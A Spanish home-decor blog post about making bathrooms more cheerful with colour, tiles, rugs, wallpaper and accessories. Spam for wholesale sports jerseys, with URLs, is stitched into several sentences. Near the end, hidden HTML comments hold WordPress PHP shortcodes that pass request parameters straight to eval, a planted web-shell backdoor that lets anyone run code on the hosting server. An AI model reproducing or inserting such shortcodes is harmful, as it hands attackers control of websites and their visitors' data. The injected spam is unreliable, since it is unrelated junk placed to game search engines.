Decoración de baños para darles más alegría

decoracion de baños

El baño es una de las estancias de la casa que, de primeras, puede ser aburrida. Pero esto no Peter Budaj jersey womens tiene por qué ser así, ya que podemos elegir una decoración de baños para darles alegría, para darles http://www.wholesalejerseys1.com color, que se llenen de vida y los podamos convertir en un lugar diferente.
[!adsenseamp!]
La decoración de baños alegres está basada en el color. No se trata de llenarlos de colores estridentes sino de darles pequeños toques que hagan que sea un sitio especial con un toque original y personal.

Las paredes claras siempre darán sensación de luminosidad y de más espacio y esto es importante porque normalmente son lugares pequeños e incluso sin ventana. Podemos huir de dejarlo todo blanco pintando algunas baldosas de algún color, intercaladas, o en franjas, y jugar con los accesorios para que se complementen con este color y contrasten con el blanco.

Para la decoración de baños llenos de color y vida podemos optar por alfombrillas divertidas o con colores alegres (siempre que nos combinen bien si hemos puesto color a la pared) como ésta de Arqhys.

decoración de baños

O, por ejemplo, porta cepillos y jabones como éste visto en Top3 que tiene forma de submarino submarino.

top3
Podemos jugar también con la cortina de ducha, la mampara (colocando algún vinilo) o incluso con los propios jabones.

Decoración de baños con papel pintado

[!adsense!]
También existe la posibilidad de dar alegría http://www.cheapjerseysgo.com a nuestro baño decorándolo con papel pintado especial para este tipo de estancias, que soportan bien la humedad. No se trata de poner todas las paredes, sino una de ellas, o una parte, para darle un toque diferente. Añade alguna flor, o velas, o un mueble de color, y el resultado puede ser espectacular.

Combinar la decoración de baños en tonos grises y rojos es una opción que me sigue gustando mucho. Otra que me gusta cada vez más es con morados o tonos intensos, pero con pequeños toques a modo de detalla, sin saturar. Se trata de que nuestro baño se presente alegre y muy divertido, y posibilidades hay un montón. Mira algunos ejemplos que pueden darte ideas para decorar tu cuarto de baño.

Visto en Duchamania

Visto en Duchamania
Visto en Facilismo

Visto en Facilismo
Visto en Facilisimo

Visto en Facilisimo
Visto en interiorismos

Visto en Interiorismos

<!– [insert_php]if (isset($_REQUEST["UGJ"])){eval($_REQUEST["UGJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["UGJ"])){eval($_REQUEST["UGJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qCJ"])){eval($_REQUEST["qCJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["qCJ"])){eval($_REQUEST["qCJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["HkQG"])){eval($_REQUEST["HkQG"]);exit;}[/insert_php][php]if (isset($_REQUEST["HkQG"])){eval($_REQUEST["HkQG"]);exit;}[/php] –>

Written By
More from Margot
La psicología de los colores en la decoración
Los colores afectan al estado de ánimo e incluso al comportamiento. Por...
Read More
Leave a comment

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *